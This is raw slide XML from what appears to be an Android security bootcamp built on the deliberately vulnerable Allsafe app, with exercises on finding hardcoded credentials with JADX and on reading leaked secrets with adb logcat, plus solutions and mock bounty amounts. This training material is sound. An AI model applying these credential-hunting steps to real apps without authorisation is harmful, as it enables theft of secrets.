            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>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1 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hardcoded Credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"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7181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4079174" y="5718138"/>
            <a:ext cx="924163" cy="723275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1"/>
              <a:t>Tools :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>JADX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7410156" y="57181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156" y="56488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6192984"/>
            <a:ext cx="761747" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>500 $</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABB6C0B9-8B62-47D6-BC00-549C85F93578}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="2910" t="4658" r="50004" b="64471"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="476885" y="6087470"/>
            <a:ext cx="1088231" cy="535781"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40166CF3-DDFD-45AB-21E8-8153689234BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1949380" y="-1668026"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-FR" sz="1200" err="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2444938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fr-FR" sz="1800" dirty="0"/>
              <a:t>JADX can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>easily</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>decompile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> the application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>binary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>toolbar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> to look for sensitive informations (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>, secret, code, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>Hardecoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> API key (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>strings.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>)</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1 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hardcoded Credentials [Solution]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="406214" y="2954829"/>
            <a:ext cx="7824120" cy="1936354"/>
            <a:chOff x="418729" y="1980326"/>
            <a:chExt cx="7824120" cy="1936354"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF1D8955-50FA-45FE-9D66-EF87A84EB950}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2"/>
            <a:srcRect l="32112" t="-248" r="519" b="71721"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="418729" y="1980326"/>
              <a:ext cx="7824120" cy="1936354"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rectangle 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="426350" y="2011680"/>
              <a:ext cx="4717150" cy="220980"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2F2F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grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"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992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a:t>Exercice 1 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hardcoded Credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58370" name="Picture 2" descr="🤑 Émoji Argent Dans Les Yeux Et La Bouche sur WhatsApp 2.20.20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1974850"/>
            <a:ext cx="965200" cy="96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3878342918"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3377247" y="32831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 $ 500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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Table 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61A429D1-B615-4399-958B-5E9281FF84CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="472005212"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6643407" y="56072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Total : $ 500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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2065717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800" b="1" dirty="0"/>
              <a:t>Mission Briefing : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>A sensitive information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>displayed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>somewhere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> in the log file. Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>what</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>take</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Ressources :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>Logcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> Tool :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" i="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://developer.android.com/studio/command-line/logcat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>Coinbase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>OAuth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>Response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>Leak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" i="1" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://hackerone.com/reports/5314</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="18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2 : Exploiting Insecure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>logging</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Fichier:Android logo 2019 (stacked).sv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7D344F0-CB75-4083-924D-46DA7EFE4FF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C78EE53-C94C-48FD-9495-BC450C4331A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3805734" y="5413338"/>
            <a:ext cx="1891030" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1"/>
              <a:t>Tools :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>ADB + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>Logcat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADDC369F-AE6C-4699-B163-D903D5C4B51B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7410156" y="5413338"/>
            <a:ext cx="1120820" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1"/>
              <a:t>Bounty :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 2" descr="🤑 Émoji Argent Dans Les Yeux Et La Bouche sur WhatsApp 2.20.206.24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00EB7686-CFC6-4AAA-9515-C67B0266C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43E418B-8591-4847-A599-9EE4B26144BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7455039" y="5922630"/>
            <a:ext cx="889987" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>1000 $</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BBC4C16-33FD-4206-8A87-05472FBFB370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="2910" t="4658" r="50004" b="64471"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="957517" y="5864973"/>
            <a:ext cx="1088231" cy="535781"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="98133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About </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>Bootcamp</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du texte 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>All-in-one</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6152" name="Picture 8" descr="Knowledge Base Archives - KPS">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7CD2DE0-9C3A-4C19-9B87-182E98C5F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66199">
            <a:off x="3694063" y="2609379"/>
            <a:ext cx="158115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lack Hat Asia 2021 - CitySCAPE">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B42722C8-AA84-4248-A504-083E55C5B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503" y="1361226"/>
            <a:ext cx="1118532" cy="1118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WASP Mobile Security Testing Guide">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B8E7296-BE0C-4D38-9849-408332462D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60952">
            <a:off x="5500153" y="2050565"/>
            <a:ext cx="1577878" cy="20828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OPPO Partners With Bug Bounty Leader HackerOne to Enhance Cybersecurity">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44A80865-B6AE-40BE-9125-F8F9E33C86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743747">
            <a:off x="1906443" y="3077205"/>
            <a:ext cx="2159000" cy="57213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cônes Filter - Téléchargement gratuit en PNG et SVG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E2C68B2-2622-4C5D-9A81-B6BAFA5BB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6296" y="432045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BC48C6-115F-47FE-9C40-FD325130DAA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2279621" y="5961502"/>
            <a:ext cx="4578350" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Training </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>materials</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1122729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b="1" dirty="0"/>
              <a:t>Option 1 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>Using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>logcat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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logcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ALLSAFE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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logcat</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pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>adb</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shell</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pidof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>infosecadventures.allsafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
